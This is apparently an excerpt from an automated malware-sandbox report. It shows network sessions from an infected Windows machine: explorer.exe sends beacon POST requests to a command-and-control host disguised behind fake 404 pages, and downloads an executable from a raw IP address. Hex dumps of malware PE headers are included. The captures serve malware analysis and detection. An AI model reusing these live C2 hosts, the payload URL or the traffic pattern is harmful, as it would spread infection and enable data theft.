                                                                                                                                                                                                    Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 a5 7a 3c cc e1 1b 52 9f e1 1b 52 9f e1 1b 52 9f ff 49 c7 9f fb 1b 52 9f ff 49 d1 9f 67 1b 52 9f c6 dd 29 9f e2 1b 52 9f e1 1b 53 9f 3e 1b 52 9f ff 49 d6 9f db 1b 52 9f ff 49 c6 9f e0 1b 52 9f ff 49 c3 9f e0 1b 52 9f 52 69 63 68 e1 1b 52 9f 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 e4 e0 b6 5f 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 09 00 00 f6 03 00 00 a8 12 00 00 00 00 00 d0 c3 01 00 00 10 00 00 00 10 04 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 f0 16 00 00 04 00 00 24 33 05 00 02 00 00 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 04 f1 03 00 28 00 00 00 00 10 16 00 b8 83 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a0 16 00 f0 1d 00 00 90 13 00 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 30 91 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 10 00 00 40 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 62 f4 03 00 00 10 00 00 00 f6 03 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 88 c9 11 00 00 10 04 00 00 18 00 00 00 fa 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 64 75 62 6f 6d 00 00 05 00 00 00 00 e0 15 00 00 02 00 00 00 12 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 78 61 6b 00 00 00 00 ea 00 00 00 00 f0 15 00 00 02 00 00 00 14 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 7a 61 77 61 78 69 67 93 0d 00 00 00 00 16 00 00 0e 00 00 00 16 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 b8 83 00 00 00 10 16 00 00 84 00 00 00 24 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 00 47 00 00 00 a0 16 00 00 48 00 00 00 a8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 6c f4 03 00 7e f4 03 00 92 f4 03 00 a8 f4 03 00 b8 f4 03 00 c8 f4 03 00 e4 f4 03 00 fc f4 03 00 10 f5 03 00 20 f5 03 00 3a f5 03 00 54 f5 03 00 6c f5 03 00 80
                                                                                                                                                                                                    Data Ascii: MZ@!L!This program cannot be run in DOS mode.$z<RRRIRIgR)RS>RIRIRIRRichRPEL_@$3(0@@.textb `.data@.dubom@.xak@.zawaxig@.rsrc$@@.relocGH@Bl~ :Tl


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                    26192.168.2.34978194.142.143.9180C:\Windows\explorer.exe
                                                                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                                                                    Jan 14, 2022 04:59:10.493510008 CET2036OUTPOST / HTTP/1.1
                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Referer: http://xpbxi.net/
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                    Content-Length: 320
                                                                                                                                                                                                    Host: host-data-coin-11.com
                                                                                                                                                                                                    Jan 14, 2022 04:59:10.574815035 CET2071INHTTP/1.1 404 Not Found
                                                                                                                                                                                                    Server: nginx/1.20.1
                                                                                                                                                                                                    Date: Fri, 14 Jan 2022 03:59:10 GMT
                                                                                                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                    Data Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                    Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                    27192.168.2.34978294.142.143.9180C:\Windows\explorer.exe
                                                                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                                                                    Jan 14, 2022 04:59:10.661796093 CET2072OUTPOST / HTTP/1.1
                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Referer: http://wefker.org/
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                    Content-Length: 342
                                                                                                                                                                                                    Host: host-data-coin-11.com
                                                                                                                                                                                                    Jan 14, 2022 04:59:10.748130083 CET2074INHTTP/1.1 404 Not Found
                                                                                                                                                                                                    Server: nginx/1.20.1
                                                                                                                                                                                                    Date: Fri, 14 Jan 2022 03:59:10 GMT
                                                                                                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                    Data Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                    Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                    28192.168.2.34978494.142.143.9180C:\Windows\explorer.exe
                                                                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                                                                    Jan 14, 2022 04:59:10.884155989 CET2077OUTPOST / HTTP/1.1
                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Referer: http://kyelhwx.com/
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                    Content-Length: 252
                                                                                                                                                                                                    Host: host-data-coin-11.com
                                                                                                                                                                                                    Jan 14, 2022 04:59:10.970359087 CET2084INHTTP/1.1 200 OK
                                                                                                                                                                                                    Server: nginx/1.20.1
                                                                                                                                                                                                    Date: Fri, 14 Jan 2022 03:59:10 GMT
                                                                                                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                    Content-Length: 0
                                                                                                                                                                                                    Connection: close


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                    29192.168.2.34978794.142.143.9180C:\Windows\explorer.exe
                                                                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                                                                    Jan 14, 2022 04:59:11.054652929 CET2098OUTPOST / HTTP/1.1
                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Referer: http://gbuig.org/
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                    Content-Length: 140
                                                                                                                                                                                                    Host: host-data-coin-11.com
                                                                                                                                                                                                    Jan 14, 2022 04:59:11.139134884 CET2119INHTTP/1.1 404 Not Found
                                                                                                                                                                                                    Server: nginx/1.20.1
                                                                                                                                                                                                    Date: Fri, 14 Jan 2022 03:59:11 GMT
                                                                                                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                    Data Raw: 32 62 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f 90 df 13 49 3c 5c a2 f7 d8 fc fb 46 f5 46 86 32 ef 06 10 c2 4b e1 e1 39 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                    Data Ascii: 2bI:82OI<\FF2K90


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                    3192.168.2.349862144.76.136.153443C:\Windows\explorer.exe
                                                                                                                                                                                                    TimestampkBytes transferredDirectionData


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                    30192.168.2.349789185.7.214.1718080C:\Windows\explorer.exe
                                                                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                                                                    Jan 14, 2022 04:59:11.262990952 CET2121OUTGET /6.php HTTP/1.1
                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                    Host: 185.7.214.171:8080
                                                                                                                                                                                                    Jan 14, 2022 04:59:11.344412088 CET2123INHTTP/1.1 200 OK
                                                                                                                                                                                                    Date: Fri, 14 Jan 2022 03:59:11 GMT
                                                                                                                                                                                                    Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                                                                                                                                                                                                    X-Powered-By: PHP/5.4.16
                                                                                                                                                                                                    Content-Transfer-Encoding: Binary
                                                                                                                                                                                                    Content-disposition: attachment; filename="mmrhuiadstzhf1d.exe"
                                                                                                                                                                                                    Keep-Alive: timeout=5, max=100
                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                                                                                    Data Raw: 34 65 32 30 30 0d 0a 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 a5 7a 3c cc e1 1b 52 9f e1 1b 52 9f e1 1b 52 9f ff 49 c7 9f fb 1b 52 9f ff 49 d1 9f 67 1b 52 9f c6 dd 29 9f e2 1b 52 9f e1 1b 53 9f 3e 1b 52 9f ff 49 d6 9f db 1b 52 9f ff 49 c6 9f e0 1b 52 9f ff 49 c3 9f e0 1b 52 9f 52 69 63 68 e1 1b 52 9f 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 da 6e de 5f 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 09 00 00 e8 03 00 00 a8 12 00 00 00 00 00 20 b6 01 00 00 10 00 00 00 00 04 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 e0 16 00 00 04 00 00 54 db 05 00 02 00 00 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 54 e3 03 00 28 00 00 00 00 00 16 00 b8 83 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 90 16 00 f8 1d 00 00 90 13 00 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 30 91 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 10 00 00 40 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 b2 e6 03 00 00 10 00 00 00 e8 03 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 88 c9 11 00 00 00 04 00 00 18 00 00 00 ec 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 6c 65 6d 65 6c 00 00 05 00 00 00 00 d0 15 00 00 02 00 00 00 04 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 6c 6f 62 69 6c 00 00 ea 00 00 00 00 e0 15 00 00 02 00 00 00 06 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 63 69 78 75 00 00 00 93 0d 00 00 00 f0 15 00 00 0e 00 00 00 08 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 b8 83 00 00 00 00 16 00 00 84 00 00 00 16 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 f6 46 00 00 00 90 16 00 00 48 00 00 00 9a 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                    Data Ascii: 4e200MZ@!L!This program cannot be run in DOS mode.$z<RRRIRIgR)RS>RIRIRIRRichRPELn_ @TT(0@@.text `.data@.lemel@.lobil@.cixu@.rsrc@@.relocFH@B


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                    31192.168.2.34979994.142.143.9180C:\Windows\explorer.exe
                                                                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                                                                    Jan 14, 2022 04:59:13.213493109 CET2696OUTPOST / HTTP/1.1
                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Referer: http://jjjeal.org/
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                    Content-Length: 121
                                                                                                                                                                                                    Host: host-data-coin-11.com
                                                                                                                                                                                                    Jan 14, 2022 04:59:13.297408104 CET2698INHTTP/1.1 404 Not Found
                                                                                                                                                                                                    Server: nginx/1.20.1
                                                                                                                                                                                                    Date: Fri, 14 Jan 2022 03:59:13 GMT
                                                                                                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                    Data Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                    Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                    32192.168.2.34980094.142.143.9180C:\Windows\explorer.exe
                                                                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                                                                    Jan 14, 2022 04:59:13.385051012 CET2699OUTPOST / HTTP/1.1
                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Referer: http://kllxbylc.org/
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                    Content-Length: 143
                                                                                                                                                                                                    Host: host-data-coin-11.com
                                                                                                                                                                                                    Jan 14, 2022 04:59:13.471846104 CET2701INHTTP/1.1 404 Not Found
                                                                                                                                                                                                    Server: nginx/1.20.1
                                                                                                                                                                                                    Date: Fri, 14 Jan 2022 03:59:13 GMT
                                                                                                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                    Data Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                    Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                    33192.168.2.34980294.142.143.9180C:\Windows\explorer.exe
                                                                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                                                                    Jan 14, 2022 04:59:13.558448076 CET2703OUTPOST / HTTP/1.1
                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Referer: http://iqiollry.net/
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                    Content-Length: 356
                                                                                                                                                                                                    Host: host-data-coin-11.com
                                                                                                                                                                                                    Jan 14, 2022 04:59:13.646641016 CET2709INHTTP/1.1 404 Not Found
                                                                                                                                                                                                    Server: nginx/1.20.1
                                                                                                                                                                                                    Date: Fri, 14 Jan 2022 03:59:13 GMT
                                                                                                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                    Data Raw: 36 36 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad 9f 1c 4f 8e 84 42 09 25 16 f9 b5 8f bd b8 15 a5 0c ce 2c b4 59 52 db 04 e5 fd 28 e3 22 58 1b b2 ed cf 00 b4 51 da 44 d0 f8 20 8c 21 ea ad 96 56 2c e4 b4 48 2b e3 b3 b6 68 f3 9a b9 59 a8 77 9f cb 31 41 5b 3d 03 4b de bb 4b bb ff 5b 91 ad d3 02 c4 60 9d d2 69 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                    Data Ascii: 66I:82OB%,YR("XQD !V,H+hYw1A[=KK[`i0


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                    34192.168.2.34981094.142.143.9180C:\Windows\explorer.exe
                                                                                                                                                                                                    TimestampkBytes transferredDirectionData
